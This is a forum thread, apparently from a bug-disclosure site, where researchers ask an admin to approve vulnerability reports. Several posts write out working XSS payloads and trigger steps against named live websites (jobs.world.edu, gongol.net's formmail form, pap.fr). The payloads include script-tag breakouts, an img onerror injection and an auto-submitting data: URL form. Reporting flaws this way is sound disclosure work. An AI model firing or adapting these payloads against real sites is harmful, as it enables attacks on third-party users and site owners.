Manual Approval Thread

Questions or requests about submissions
gabrielbc2013
Posts:3
Joined:Tue Dec 22, 2020 4:32 pm
Re: Manual Approval Thread

Post by gabrielbc2013 » Sun Mar 07, 2021 12:04 pm

Hello administrator, how are you?

Can you approve this report?

ID: 1942173

Thank you very much for your attention!

x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: Manual Approval Thread

Post by x1admin » Tue Mar 09, 2021 4:01 am

approved

amlnspqr
Posts:291
Joined:Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Tue Mar 09, 2021 2:02 pm

1939986 - click the fb button

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Tue Mar 09, 2021 3:20 pm

Hello, please approve ID 1945783
Visiting the url https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.
Attachments
Screenshot from 2021-03-09 15-18-36.png

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Wed Mar 10, 2021 12:32 pm

Hello, please approve the following IDs:
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url https://jobs.world.edu/ and you will get the following xss triggered.
Screenshot from 2021-03-10 12-30-36.png
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered
Screenshot from 2021-03-10 12-31-56.png
Screenshot from 2021-03-10 12-32-13.png
Many thanks,

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Wed Mar 10, 2021 4:19 pm

Hello please approve ID 1946511.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>

When page automatically refreshes you get the xss triggered:
Screenshot from 2021-03-10 15-54-52.png
This is a problem with the formmail.py configuration with the site.

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Thu Mar 11, 2021 1:42 pm

Hello,
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss.
Screenshot from 2021-03-11 13-42-53.png
Screenshot from 2021-03-11 13-43-04.png
Many thanks

dtulupov
Posts:28
Joined:Thu Dec 17, 2015 10:55 am

Re: Manual Approval Thread

Post by dtulupov » Fri Mar 12, 2021 8:10 am

Hello, please approve (Improper Access Control (IAC)):
1947620
1947623
1947624
1947625
1947626
1947638
1947641

PC_Mechanic
Posts:31
Joined:Sat Mar 21, 2020 6:33 pm

Re: Manual Approval Thread

Post by PC_Mechanic » Sun Mar 14, 2021 4:51 pm

Hi Admin

Please approve 1922509

This is 100% reproducible

x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: Manual Approval Thread

Post by x1admin » Mon Mar 15, 2021 6:37 am

approved
